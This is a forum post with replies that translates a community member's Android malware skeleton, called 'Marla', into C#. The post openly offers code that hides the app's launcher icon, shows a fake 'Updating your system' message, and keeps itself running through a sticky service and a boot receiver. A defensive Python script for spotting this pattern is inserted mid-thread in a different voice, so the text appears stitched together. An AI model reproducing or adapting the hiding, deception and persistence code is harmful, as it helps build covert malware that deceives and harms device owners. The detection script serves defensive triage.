Android Malware: A Tumor called Marla 0x02 [C#]

Hey mates,
Again, I translated @L3akM3-0day’s code into C#. See the original article here :wink:.


Hiding App Icon

Main activity

using System;
using Android.App;
using Android.Content;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.OS;

using Android.Content.PM;

namespace Marla
{
    [Activity(Label = "Marla", MainLauncher = true, Icon = "@drawable/icon")]
    public class MainActivity : Activity
    {
        protected override void OnCreate(Bundle bundle)
        {
            base.OnCreate(bundle);

            // The App-hiding line ;)
            PackageManager.SetComponentEnabledSetting(base.ComponentName, ComponentEnabledState.Disabled, ComponentEnableOption.DontKillApp);

            // The Toast
            Toast.MakeText(this, "Updating your system please wait ...", ToastLength.Long);

        }
    }
}

The Service

using System;
using Android.App;
using Android.Content;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.OS;

namespace Marla
{
    [Service]
    public class MainService : Service
    {
        public override StartCommandResult OnStartCommand(Android.Content.Intent intent, StartCommandFlags flags, int startId)
        {
            // Show Toast in UI Thread
            Application.SynchronizationContext.Post(_ => { Toast.MakeText(Android.App.Application.Context, "Malware Started!", ToastLength.Long).Show(); }, null);

            // Restart Service after being closed due to low memory
            return StartCommandResult.Sticky;
        }

        public override IBinder OnBind(Intent intent)
        {
            // We don't need any bindings -> Return null
            return null;
        }
    }
}

BroadcastReceiver

The same as last time :wink:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;

namespace Marla
{
    /// <summary>
    /// Waits for Boot to start the MainActivity
    /// </summary>
    [BroadcastReceiver]
    [IntentFilter(new[] { Intent.ActionBootCompleted })]
    partial class BootReceiver : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            if (intent.Action == Intent.ActionBootCompleted)
            {         
                context.StartActivity(typeof(MainActivity));
            }
        }
    }
}

Conclusion

A very light post about @L3akM3-0day’s malware translated into C#. Maybe this helps someone who wants to write his malware in a language other than (at least hated by me) Java :smile:.

|-TheDoctor-|

4 Likes
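For defenders triaging a device for the pattern in this post (a launcher activity that disables its own component, plus a `BOOT_COMPLETED` receiver), here is an added example that is not part of the original post or of @L3akM3-0day's code. The package name `com.example.marla`, the manifest and the `dumpsys` excerpt are constructed samples; it assumes fully qualified component names and that `adb shell dumpsys package <pkg>` lists runtime-disabled components under a `disabledComponents:` heading.

```python
import re
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: decoded manifest of a hypothetical package.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <application>
    <activity android:name="com.example.marla.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name="com.example.marla.BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed sample shaped like an excerpt of `dumpsys package` output.
DUMPSYS = """    User 0: installed=true hidden=false stopped=false enabled=0
      disabledComponents:
        com.example.marla.MainActivity
      enabledComponents:
        com.example.marla.MainService
"""

def components_with(root, tag, child, value):
    """Names of <tag> elements containing <child android:name=value>."""
    return {el.get(ANDROID + "name") for el in root.iter(tag)
            if any(c.get(ANDROID + "name") == value for c in el.iter(child))}

def disabled_components(dumpsys):
    """Union of component names under every disabledComponents: heading."""
    blocks = re.finditer(r"disabledComponents:\n((?:[ \t]+[\w.$]+\n)+)", dumpsys)
    return {name for m in blocks for name in m.group(1).split()}

def triage(manifest, dumpsys):
    root = ET.fromstring(manifest)
    launchers = components_with(root, "activity", "category", "android.intent.category.LAUNCHER")
    boot = components_with(root, "receiver", "action", "android.intent.action.BOOT_COMPLETED")
    hidden = launchers & disabled_components(dumpsys)
    # Flag only when every launcher entry is gone and the app still starts at boot.
    return {"hidden_launchers": sorted(hidden), "boot_receivers": sorted(boot),
            "suspicious": bool(hidden) and hidden == launchers and bool(boot)}

if __name__ == "__main__":
    print(triage(MANIFEST, DUMPSYS))
```

A hit is a lead for review rather than a verdict, since some legitimate apps also remove their launcher entry.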

Nice :slight_smile: It's cool that you translate my code :stuck_out_tongue:

2 Likes

I learn some stuff when I translate, e.g. the icon hiding thing could be useful for Argus :wink:, so I have to thank you for the original articles :slight_smile:.

1 Like

No problem :slight_smile: Hacking is sharing knowledge

Neato-o mate! Nice code! Translated it great too! @L3akM3-0day did a great job with the original, and so did you with the C# version.

2 Likes
